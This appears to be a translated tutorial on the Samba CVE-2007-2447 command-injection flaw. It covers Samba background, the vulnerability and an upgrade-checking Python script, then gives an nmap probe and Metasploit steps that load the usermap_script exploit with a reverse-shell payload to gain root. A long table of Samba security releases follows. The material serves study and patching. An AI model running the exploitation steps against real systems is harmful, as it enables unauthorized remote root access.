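Contents
1. Introduction to the Samba service
2. Vulnerability information
3. Probing for Samba
4. Exploitation with Metasploit
5. Samba vulnerabilities over the years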
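1. Introduction to the Samba service
1.1 Samba is free software that implements the SMB protocol on Linux and UNIX systems; it consists of server and client programs.
1.2 SMB (Server Message Block) is a communication protocol for sharing files and printers on a local area network; it provides file, printer and other resource sharing between the computers on the LAN. SMB is a client/server (C/S) protocol: through it, a client can access shared file systems, printers and other resources on the server.
1.3 Ports Samba listens on
TCP: 139, 445. The TCP ports belong to the smbd service, which provides shared access to the server's file and print resources.
UDP: 137, 138. The UDP ports belong to the nmbd service, which provides NetBIOS host name resolution.
Further reading: "Samba 服务详解" (A Detailed Guide to the Samba Service), 公博义's blog on CSDN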
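2. Vulnerability information
2.1 About the usermap_script vulnerability in the Samba service:
Username map script is a vulnerability in Samba (CVE-2007-2447), first disclosed in 2007. It is a remote command injection vulnerability that mainly affects Samba versions 3.0.20 through 3.0.25rc3.
2.2 Vulnerability description:
Samba has an input validation flaw in its handling of user data that a remote attacker may exploit to execute arbitrary commands on the server. The Samba code responsible for updating user passwords in the SAM database passes user input to /bin/sh without filtering it. If malicious input is submitted through an MS-RPC call that reaches /bin/sh when an external script defined in smb.conf is invoked, the attacker may be able to execute arbitrary commands with the privileges of the nobody user.
References:
Alibaba Cloud Vulnerability Database
https://www.cnvd.org.cn/flaw/show/CNVD-2007-3296
NVD - CVE-2007-2447
2.3 Solution:
Upgrade to a later version.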
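To decide which hosts need the upgrade, the following added example (not part of the original article) checks a Samba version string against the affected range given in 2.1 and reports whether smb.conf sets username map script. The function names, the sample version string and the sample smb.conf are constructed for illustration.

```python
import re

# Affected range as stated in section 2.1 of this page. The release table on
# this page lists 3.0.0 as the lower bound; pass low="3.0.0" to be conservative.
AFFECTED_LOW, AFFECTED_HIGH = "3.0.20", "3.0.25rc3"

_VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)(?:(pre|rc)(\d+)|([a-z])(?![a-z]))?")
_STAGE = {"pre": 0, "rc": 1}  # a final release sorts after both

def version_key(text):
    """Sortable key: 3.0.25pre2 < 3.0.25rc3 < 3.0.25 < 3.0.25a."""
    m = _VERSION_RE.search(text)
    if not m:
        raise ValueError(f"no Samba version in {text!r}")
    major, minor, patch, stage, stage_num, letter = m.groups()
    if stage:
        tail = (_STAGE[stage], int(stage_num))
    else:
        tail = (2, ord(letter) - ord("a") + 1 if letter else 0)
    return (int(major), int(minor), int(patch)) + tail

def global_params(conf_text):
    """Return {name: value} for [global], names lower-cased without spaces."""
    params, section = {}, None
    for raw in conf_text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":        # blank line or comment
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
        elif section == "global" and "=" in line:
            name, value = line.split("=", 1)
            # smb.conf parameter names ignore case and whitespace.
            params["".join(name.lower().split())] = value.strip()
    return params

def assess(version_text, conf_text, low=AFFECTED_LOW, high=AFFECTED_HIGH):
    """Combine the version check with the 'username map script' setting."""
    in_range = version_key(low) <= version_key(version_text) <= version_key(high)
    script = global_params(conf_text).get("usernamemapscript", "")
    if not in_range:
        verdict = "outside the affected range"
    elif script:
        verdict = "affected and username map script is set: upgrade now"
    else:
        verdict = "affected version: upgrade"
    return {"in_range": in_range, "map_script": script, "verdict": verdict}

# Constructed sample input (not taken from a real host).
SAMPLE_VERSION = "Version 3.0.20-Debian"          # shape of `smbd -V` output
SAMPLE_CONF = """\
[global]
   workgroup = WORKGROUP
   ; comment line
   Username Map Script = /etc/samba/scripts/mapusers.sh
[tmp]
   path = /tmp
"""

if __name__ == "__main__":
    print(assess(SAMPLE_VERSION, SAMPLE_CONF))
```

Only the username map script option named in 2.1 is inspected; a host in the affected range should be upgraded whether or not the option is set.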
3. Probing for Samba
Probe with nmap:
nmap -sV -p 139,445 ip
4. Exploitation with Metasploit
Use the Samba usermap RCE module that ships with Metasploit:
exploit/multi/samba/usermap_script
use exploit/multi/samba/usermap_script
show options
set rhosts 192.168.106.132
Attack using a payload:
show payloads
set payload cmd/unix/reverse
show options
exploit
Root access to the target machine is obtained; press CTRL+C to exit.
5. Samba vulnerabilities over the years
References:
Samba - Security Updates and Information
Alibaba Cloud Vulnerability Database
Samba Security Releases
Release date | Download | Known issues | Affected versions | CVE ID # | Details |
---|---|---|---|---|---|
25 October 2022 | patch for Samba 4.17.2 patch for Samba 4.16.6 patch for Samba 4.15.11 | CVE-2022-3437 and CVE-2022-3592. Please see announcements for details. | Please refer to the advisories. | CVE-2022-3437, CVE-2022-3592. | Announcement, Announcement. |
27 July 2022 | patch for Samba 4.16.4 patch for Samba 4.15.9 patch for Samba 4.14.14 | CVE-2022-2031, CVE-2022-32742, CVE-2022-32744, CVE-2022-32745 and CVE-2022-32746. Please see announcements for details. | Please refer to the advisories. | CVE-2022-2031, CVE-2022-32742, CVE-2022-32744, CVE-2022-32745, CVE-2022-32746. | Announcement, Announcement, Announcement, Announcement, Announcement. |
31 January 2022 | patch for Samba 4.15.5 patch for Samba 4.14.12 patch for Samba 4.13.17 | CVE-2021-44141, CVE-2021-44142 and CVE-2022-0336. Please see announcements for details. | Please refer to the advisories. | CVE-2021-44141, CVE-2021-44142, CVE-2022-0336. | Announcement, Announcement, Announcement. |
10 January 2022 | patch for Samba 4.13.16 | Symlink race error can allow directory creation outside of the exported share. | All versions of the Samba file server prior to 4.13.16 | CVE-2021-43566. | Announcement. |
9 November 2021 | patch for Samba 4.15.1 patch for Samba 4.14.9 patch for Samba 4.13.13 | CVE-2016-2124, CVE-2020-25717, CVE-2020-25718, CVE-2020-25719, CVE-2020-25721, CVE-2020-25722, CVE-2021-3738 and CVE-2021-23192. Please see announcements for details. | Please refer to the advisories. | CVE-2016-2124, CVE-2020-25717, CVE-2020-25718, CVE-2020-25719, CVE-2020-25721, CVE-2020-25722, CVE-2021-3738, CVE-2021-23192. | Announcement, Announcement, Announcement, Announcement, Announcement, Announcement, Announcement, Announcement. |
29 Apr 2021 | patch for Samba 4.14.3 patch for Samba 4.13.7 patch for Samba 4.12.14 | Negative idmap cache entries can cause incorrect group entries in the Samba file server process token. | All versions since 3.6.0. | CVE-2021-20254 | Announcement |
24 Mar 2021 | patch for Samba 4.14.0 patch for Samba 4.13.5 patch for Samba 4.12.12 | CVE-2020-27840 and CVE-2021-20277. Please see announcements for details. | Please refer to the advisories. | CVE-2020-27840, CVE-2021-20277. | Announcement, Announcement. |
29 Oct 2020 | patch for Samba 4.13.0 patch for Samba 4.12.8 patch for Samba 4.11.14 | CVE-2020-14318, CVE-2020-14323 and CVE-2020-14383. Please see announcements for details. | Please refer to the advisories. | CVE-2020-14318, CVE-2020-14323, CVE-2020-14383. | Announcement, Announcement, Announcement. |
18 Sep 2020 | patch for Samba 4.12.6 patch for Samba 4.11.12 patch for Samba 4.10.17 | CVE-2020-1472. Please see announcements for details. | Please refer to the advisory. | CVE-2020-1472. | Announcement |
02 Jul 2020 | patch for Samba 4.12.3 patch for Samba 4.11.10 patch for Samba 4.10.16 | CVE-2020-10730, CVE-2020-10745, CVE-2020-10760 and CVE-2020-14303. Please see announcements for details. | Please refer to the advisories. | CVE-2020-10730, CVE-2020-10745, CVE-2020-10760, CVE-2020-14303. | Announcement, Announcement, Announcement, Announcement |
28 Apr 2020 | patch for Samba 4.12.1 patch for Samba 4.11.7 patch for Samba 4.10.14 | CVE-2020-10700 and CVE-2020-10704. Please see announcements for details. | Please refer to the advisories. | CVE-2020-10700, CVE-2020-10704. | Announcement, Announcement |
21 Jan 2020 | patch for Samba 4.11.4 patch for Samba 4.10.11 patch for Samba 4.9.17 | CVE-2019-14902, CVE-2019-14907 and CVE-2019-19344. Please see announcements for details. | Please refer to the advisories. | CVE-2019-14902, CVE-2019-14907, CVE-2019-19344. | Announcement, Announcement, Announcement |
10 Dec 2019 | patch for Samba 4.11.2 patch for Samba 4.10.10 patch for Samba 4.9.16 | CVE-2019-14861 and CVE-2019-14870. Please see announcements for details. | All versions since Samba 4.0 | CVE-2019-14861, CVE-2019-14870. | Announcement, Announcement |
29 Oct 2019 | patch for Samba 4.11.1 patch for Samba 4.10.9 patch for Samba 4.9.14 | CVE-2019-10218, CVE-2019-14833 and CVE-2019-14847. Please see announcements for details. | please refer to the advisories | CVE-2019-10218, CVE-2019-14833, CVE-2019-14847 | Announcement, Announcement, Announcement |
03 Sep 2019 | patch for Samba 4.10.7 patch for Samba 4.9.12 | Combination of parameters and permissions can allow user to escape from the share path definition. | All versions between Samba 4.9.0 and 4.9.12/4.10.7 (incl.). | CVE-2019-10197 | Announcement |
19 Jun 2019 | patch for Samba 4.10.4 (both CVEs) patch for Samba 4.9.8 (CVE-2019-12435 only) | CVE-2019-12435 and CVE-2019-12436. Please see the announcements for details. | please refer to the advisories | CVE-2019-12435, CVE-2019-12436 | Announcement, Announcement |
14 May 2019 | patch for Samba 4.10.2 patch for Samba 4.9.7 patch for Samba 4.8.11 | CVE-2018-16860. Please see the announcements for details. | All versions of Samba prior to 4.10.3, 4.9.8, 4.8.12. | CVE-2018-16860 | Announcement |
08 Apr 2019 | patch for Samba 4.10.1 (both CVEs) patch for Samba 4.9.5 (both CVEs) patch for Samba 4.8.10 (CVE-2019-3880 only) | CVE-2019-3870 and CVE-2019-3880. Please see the announcements for details. | please refer to the advisories | CVE-2019-3870, CVE-2019-3880 | Announcement, Announcement |
27 Nov 2018 | patch for Samba 4.9.2 (all CVEs) patch for Samba 4.8.6 (all CVEs except CVE-2018-16852 and CVE-2018-16857) patch for Samba 4.7.11 (all CVEs except CVE-2018-16852 and CVE-2018-16857) | Numerous CVEs. Please see the announcements for details. | please refer to the advisories | CVE-2018-14629, CVE-2018-16841, CVE-2018-16851, CVE-2018-16852, CVE-2018-16853, CVE-2018-16857 | Announcement, Announcement, Announcement, Announcement, Announcement, Announcement |
14 Aug 2018 | patch for Samba 4.8.3 (all CVEs) patch for Samba 4.7.8 (all CVEs except CVE-2018-1140) patch for Samba 4.6.15 (CVE-2018-10858 and CVE-2018-10919) | Numerous CVEs. Please see the announcements for details. | please refer to the advisories | CVE-2018-10858, CVE-2018-10918, CVE-2018-10919, CVE-2018-1139, CVE-2018-1140 | Announcement, Announcement, Announcement, Announcement, Announcement |
13 Mar 2018 | patch for Samba 4.7.5 patch for Samba 4.6.13 patch for Samba 4.5.15 patch for Samba 4.4.16 (only CVE-2018-1057) patch for Samba 4.3.13 (only CVE-2018-1057) | Numerous CVEs. Please see the announcements for details. | please refer to the advisories | CVE-2018-1050, CVE-2018-1057 | Announcement, Announcement |
21 Nov 2017 | patch for Samba 4.7.2 patch for Samba 4.6.10 patch for Samba 4.5.14 | Numerous CVEs. Please see the announcements for details. | please refer to the advisories | CVE-2017-14746, CVE-2017-15275 | Announcement, Announcement |
20 Sep 2017 | patch for Samba 4.6.7 patch for Samba 4.5.13 patch for Samba 4.4.15 | Numerous CVEs. Please see the announcements for details. | please refer to the advisories | CVE-2017-12150, CVE-2017-12151, CVE-2017-12163 | Announcement, Announcement, Announcement |
12 July 2017 | patch for Samba 4.x.y | Orpheus' Lyre mutual authentication validation bypass. | All versions between Samba 4.0.0 and 4.6.6/4.5.12/4.4.15 | CVE-2017-11103 | Announcement |
24 May 2017 | patch for Samba 4.6.3, 4.5.9, 4.4.13 | Remote code execution from a writable share. | All versions between Samba 3.5.0 and 4.6.4/4.5.10/4.4.14 | CVE-2017-7494 | Announcement |
23 Mar 2017 | patch for Samba 4.6.0 patch for Samba 4.5.6 patch for Samba 4.4.11 | Symlink race allows access outside share definition. | All versions of Samba prior to 4.6.1, 4.5.7, 4.4.12 | CVE-2017-2619 | Announcement |
19 Dec 2016 | patch for Samba 4.5.2 patch for Samba 4.4.7 patch for Samba 4.3.12 | Numerous CVEs. Please see the announcements for details. | please refer to the advisories | CVE-2016-2123, CVE-2016-2125, CVE-2016-2126 | Announcement, Announcement, Announcement |
07 Jul 2016 | patch for Samba 4.4.4 patch for Samba 4.3.10 patch for Samba 4.2.13 | Client side SMB2/3 required signing can be downgraded. | 4.0.0 - 4.4.4 | CVE-2016-2119 | Announcement |
12 Apr 2016 | patch for Samba 4.4.0 patch for Samba 4.3.6 patch for Samba 4.2.9 patch for Samba 4.0.26 (fileserver only! no client! no domain controller!) patch for Samba 3.6.25 (only related CVEs) | Numerous CVEs. Please see the announcements for details. | please refer to the advisories | CVE-2015-5370, CVE-2016-2110, CVE-2016-2111, CVE-2016-2112, CVE-2016-2113, CVE-2016-2114, CVE-2016-2115, CVE-2016-2118 | Announcement Announcement Announcement Announcement Announcement Announcement Announcement Announcement |
08 Mar 2016 | patch for Samba 4.3.5 patch for Samba 4.2.8 patch for Samba 4.1.22 | Incorrect ACL get/set allowed on symlink path, Out-of-bounds read in internal DNS server. | please refer to the advisories | CVE-2015-7560, CVE-2016-0771 | Announcement Announcement |
16 Dec 2015 | patch for Samba 4.3.2 patch for Samba 4.2.6 patch for Samba 4.1.21 patch for Samba 3.6.25 | Numerous CVEs. Please see the announcements for details. | 3.0.0 to 4.3.2 | CVE-2015-3223, CVE-2015-5252, CVE-2015-5296, CVE-2015-5299, CVE-2015-5330, CVE-2015-7540, CVE-2015-8467 | Announcement Announcement Announcement Announcement Announcement Announcement Announcement |
23 Feb 2015 | patch for Samba 4.1.16 patch for Samba 4.0.24 patch for Samba 3.6.24 patch for Samba 3.5.22 | Unexpected code execution in smbd. | 3.5.0 - 4.2.0rc4 | CVE-2015-0240 | Announcement |
15 Jan 2015 | patch for Samba 4.1.15 patch for Samba 4.0.23 | Elevation of privilege to Active Directory Domain Controller. | 4.0.0 - 4.1.15 | CVE-2014-8143 | Announcement |
01 Aug 2014 | patch for Samba 4.1.10 patch for Samba 4.0.20 | Remote code execution in nmbd. | 4.0.0 - 4.1.10 | CVE-2014-3560 | Announcement |
23 Jun 2014 | patch for Samba 4.1.8 patch for Samba 4.0.18 patch for Samba 3.6.23 | Denial of service - CPU loop, Denial of service - Server crash/memory corruption. | please refer to the advisories | CVE-2014-0244, CVE-2014-3493 | Announcement Announcement |
03 June 2014 | patch for Samba 4.0.17 patch for Samba 4.1.7 patch for Samba 3.6.23 (CVE-2014-0178 only) | Uninitialized memory exposure, Potential DOS in Samba internal DNS server. | please refer to the advisories | CVE-2014-0178, CVE-2014-0239 | Announcement Announcement |
11 Mar 2014 | patch for Samba 4.1.5 patch for Samba 4.0.15 patch for Samba 3.6.22 | Password lockout not enforced for SAMR password changes, smbcacls can remove a file or directory ACL by mistake. | please refer to the advisories | CVE-2013-4496, CVE-2013-6442 | Announcement Announcement |
09 Dec 2013 | patch for Samba 4.1.2 patch for Samba 4.0.12 patch for Samba 3.6.21 patch for Samba 3.5.22 patch for Samba 3.4.17 | DCE-RPC fragment length field is incorrectly checked, pam_winbind login without require_membership_of restrictions. | please refer to the advisories | CVE-2013-4408, CVE-2012-6150 | Announcement Announcement |
11 Nov 2013 | patch for Samba 4.1.0 patch for Samba 4.0.10 patch for Samba 3.6.19 | ACLs are not checked on opening an alternate data stream on a file or directory, Private key in key.pem world readable. | 3.2.0 - 4.1.0, 4.0.0 - 4.0.10, 4.1.0 | CVE-2013-4475, CVE-2013-4476 | Announcement Announcement |
05 Aug 2013 | patch for Samba 4.0.7 patch for Samba 3.6.16 patch for Samba 3.5.21 | Denial of service - CPU loop and memory allocation. | 3.0.x-4.0.7 | CVE-2013-4124 | Announcement |
02 Apr 2013 | patch for Samba 3.6.5 | A writable configured share might get read only | 3.6.0 - 3.6.5 (inclusive) | CVE-2013-0454 | Announcement |
19 Mar 2013 | patch for Samba 4.0.3 | World-writeable files may be created in additional shares on a Samba 4.0 AD DC. | 4.0.0rc6-4.0.3 | CVE-2013-1863 | Announcement |
30 Jan 2013 | patch for Samba 4.0.1 patch for Samba 3.6.11 patch for Samba 3.5.20 | Clickjacking issue and potential XSRF in SWAT. | 3.0.x-4.0.1 | CVE-2013-0213, CVE-2013-0214 | Announcement Announcement |
15 Jan 2013 | patch for Samba 4.0.0 | Samba 4.0 as an AD DC may provide authenticated users with write access to LDAP directory objects. | 4.0.0 | CVE-2013-0172 | Announcement |
30 Apr 2012 | patch for Samba 3.4.16 patch for Samba 3.5.14 patch for Samba 3.6.4 | Incorrect permission checks when granting/removing privileges can compromise file server security. | 3.4.x-3.6.4 | CVE-2012-2111 | Announcement |
10 Apr 2012 | patch for Samba 3.0.37 patch for Samba 3.2.15 patch for Samba 3.3.16 patch for Samba 3.4.15 patch for Samba 3.5.13 patch for Samba 3.6.3 | "root" credential remote code execution | all current releases | CVE-2012-1182 | Announcement |
23 Feb 2012 | patch for Samba 3.0 patch for Samba 3.2 patch for Samba 3.3 | Remote code execution vulnerability in smbd | pre-3.4 | CVE-2012-0870 | Announcement |
29 Jan 2012 | patch for Samba 3.6.2 | Memory leak/Denial of service | 3.6.0-3.6.2 | CVE-2012-0817 | Announcement |
26 Jul 2011 | patch for Samba 3.3.15 patch for Samba 3.4.13 patch for Samba 3.5.9 | Cross-Site Request Forgery in SWAT | all current releases | CVE-2011-2522 | Announcement |
26 Jul 2011 | patch for Samba 3.3.15 patch for Samba 3.4.13 patch for Samba 3.5.9 | Cross-Site Scripting vulnerability in SWAT | all current releases | CVE-2011-2694 | Announcement |
18 Feb 2011 | patch for Samba 3.3.14 patch for Samba 3.4.11 patch for Samba 3.5.6 | Denial of service - memory corruption | all current releases | CVE-2011-0719 | Announcement |
14 Sep 2010 | patch for Samba 3.3.13 patch for Samba 3.4.8 patch for Samba 3.5.4 | Buffer Overrun Vulnerability | all current releases | CVE-2010-3069 | Announcement |
16 Jun 2010 | patch for Samba 3.3.12 and 3.2.15 patch for Samba 3.0.37 | Memory Corruption Vulnerability | 3.0.x, 3.2.x, 3.3.0-3.3.12 | CVE-2010-2063 | Announcement |
08 Mar 2010 | patch for Samba 3.5.0 patch for Samba 3.4.6 patch for Samba 3.3.11 | Permission ignored | 3.3.11, 3.4.6, 3.5.0 | CVE-2010-0728 | Announcement |
02 Feb 2010 | not available | Change parameter "wide links" to default to "no" | pre-3.4.6 | CVE-2010-0926 | Announcement |
01 Oct 2009 | patch 1 for Samba 3.4.1 patch 2 for Samba 3.4.1 patch 1 for Samba 3.3.7 patch 2 for Samba 3.3.7 patch 1 for Samba 3.2.14 patch 2 for Samba 3.2.14 patch 1 for Samba 3.0.36 patch 2 for Samba 3.0.36 | Information disclosure by setuid mount.cifs | all releases | CVE-2009-2948 | Announcement |
01 Oct 2009 | patch for Samba 3.4.1 patch for Samba 3.3.7 patch for Samba 3.2.14 patch for Samba 3.0.36 | Remote DoS against smbd on authenticated connections | all releases | CVE-2009-2906 | Announcement |
01 Oct 2009 | patch for Samba 3.4.1 patch for Samba 3.3.7 patch for Samba 3.2.14 patch for Samba 3.0.36 | Misconfigured /etc/passwd file may share folders unexpectedly | > 3.0.11 | CVE-2009-2813 | Announcement |
23 Jun 2009 | patch for Samba 3.3.5 patch for Samba 3.2.12 patch for Samba 3.0.34 | Uninitialized read of a data value | Samba 3.0.31 - 3.3.5 | CVE-2009-1888 | Announcement |
23 Jun 2009 | patch for Samba 3.2.12 | Formatstring vulnerability in smbclient | Samba 3.2.0 - 3.2.12 | CVE-2009-1886 | Announcement |
05 Jan 2009 | patch for Samba 3.2.6 | Potential access to "/" in setups with registry shares enabled | Samba 3.2.0 - 3.2.6 | CVE-2009-0022 | Announcement |
27 Nov 2008 | patch for Samba 3.0.32 patch for Samba 3.2.4 | Potential leak of arbitrary memory contents | Samba 3.0.29 - 3.2.4 | CVE-2008-4314 | Announcement |
27 Aug 2008 | patch 1 for Samba 3.2.2 patch 2 for Samba 3.2.2 | Wrong permissions of group_mapping.ldb | Samba 3.2.0 - 3.2.2 | CVE-2008-3789 | Announcement |
29 May 2008 | patch for Samba 3.0.29 | Boundary failure when parsing SMB responses | Samba 3.0.0 - 3.0.29 | CVE-2008-1105 | Announcement |
10 Dec 2007 | patch for Samba 3.0.27a | Remote Code Execution in Samba's nmbd (send_mailslot()) | Samba 3.0.0 - 3.0.27a | CVE-2007-6015 | Announcement |
15 Nov 2007 | patch for Samba 3.0.26a | Remote Code Execution in Samba's nmbd | Samba 3.0.0 - 3.0.26a | CVE-2007-5398 | Announcement |
15 Nov 2007 | patch for Samba 3.0.26a | GETDC mailslot processing buffer overrun in nmbd | Samba 3.0.0 - 3.0.26a | CVE-2007-4572 | Announcement |
11 Sep 2007 | patch for Samba 3.0.25 | Incorrect primary group assignment for users using the rfc2307 or sfu nss info plugin. | Samba 3.0.25 - 3.0.25c | CVE-2007-4138 | Announcement |
14 May 2007 | patch for Samba 3.0.24 | Remote Command Injection Vulnerability (Updated June 5 to include missing "c" character from INCLUDE list). | Samba 3.0.0 - 3.0.25rc3 | CVE-2007-2447 | Announcement |
14 May 2007 | patch for Samba 3.0.24 | Multiple Heap Overflows Allow Remote Code Execution (Updated May 25 to fix regression in Samba domain controller logon code). | Samba 3.0.0 - 3.0.25rc3 | CVE-2007-2446 | Announcement |
14 May 2007 | patch for Samba 3.0.24 | Local SID/Name translation bug can result in user privilege elevation (Updated May 25 to fix regression in the "force group" parameter). | Samba 3.0.23d - 3.0.25pre2 | CVE-2007-2444 | Announcement |
5 Feb 2007 | patch for Samba 3.0.23d | Potential Denial of Service bug in smbd | Samba 3.0.6 - 3.0.23d | CVE-2007-0452 | Announcement |
5 Feb 2007 | patch for Samba 3.0.23d | Buffer overrun in NSS host lookup Winbind library on Solaris | Samba 3.0.21 - 3.0.23d | CVE-2007-0453 | Announcement |
5 Feb 2007 | patch for Samba 3.0.23d | Format string bug in afsacl.so VFS plugin | Samba 3.0.6 - 3.0.23d | CVE-2007-0454 | Announcement |
10 July 2006 | patch for Samba 3.0.1 - 3.0.22 | Memory exhaustion DoS against smbd | Samba 3.0.1 - 3.0.22 | CVE-2006-3403 | Announcement |
30 March 2006 | patch for Samba 3.0.21[a-c] | Exposure of machine account credentials in winbind log files | Samba 3.0.21 - 3.0.21c | CVE-2006-1059 | Announcement |
16 December 2004 | patch for Samba 3.0.9 | Integer Overflow in security descriptor parsing | Samba 2.x, 3.0.x <= 3.0.9 | CVE-2004-1154 | Announcement |
15 November 2004 | patch for <=Samba 3.0.7 | Buffer Overrun in smbd | Samba 3.0.x <= 3.0.7 | CVE-2004-0882 | Announcement |
8 November 2004 | patch for <=Samba 3.0.7 | Remote DoS | Samba 3.0.x <= 3.0.7 | CVE-2004-0930 | Announcement |
30 September 2004 | Samba 2.2.12 and/or patch for <=Samba 3.0.2a | Potential arbitrary file access | Samba 2.2.x <=2.2.11 and Samba 3.0.x <=3.0.2a | CVE-2004-0815 | Announcement |
13 Sept 2004 | 3.0.5 patch | Two DoS bugs; one affecting smbd, the other nmbd. | 3.0.x <= 3.0.6 | CVE-2004-0807, CVE-2004-0808 | Announcement |
22 Jul 2004 | 3.0.5 | Two potential buffer overruns | >=3.0.2 | CVE-2004-0600, CVE-2004-0686 | CVE-2004-0600 Announcement CVE-2004-0686 Announcement |
22 Jul 2004 | 2.2.10 | Buffer overrun in hash mangling method | all 2.2 releases | CVE-2004-0686 | release notes |
9 Feb 2004 | 3.0.2a | Password initialization bug that could grant an attacker unauthorized access to a user account created by the mksmbpasswd.sh shell script. | >=3.0.0 | CVE-2004-0082 | Announcement |
7 Apr 2003 | 2.2.8a | Buffer overrun condition in the SMB/CIFS packet fragment re-assembly code. | all 2.0 releases and <= 2.2.8 | CVE-2003-0196, CVE-2003-0201 | release notes |
10 Dec 2002 | 2.2.7a | Bug in the length checking for encrypted password change requests from clients. | 2.2.2 - 2.2.6 | CVE-2003-0085 | release notes |
23 Jun 2001 | 2.2.0a | Bug in expansion of certain smb.conf variables such as %m that could grant an attacker the capability to overwrite arbitrary files on the server. Bug that causes smbd not to honor the hosts allow and deny smb.conf directives. | 2.2.0 | | release notes |
23 Jun 2001 | 2.0.10 | Bug in the handling of temporary files that allows local users to destroy data on local devices. | >= 2.0.0 | | release notes |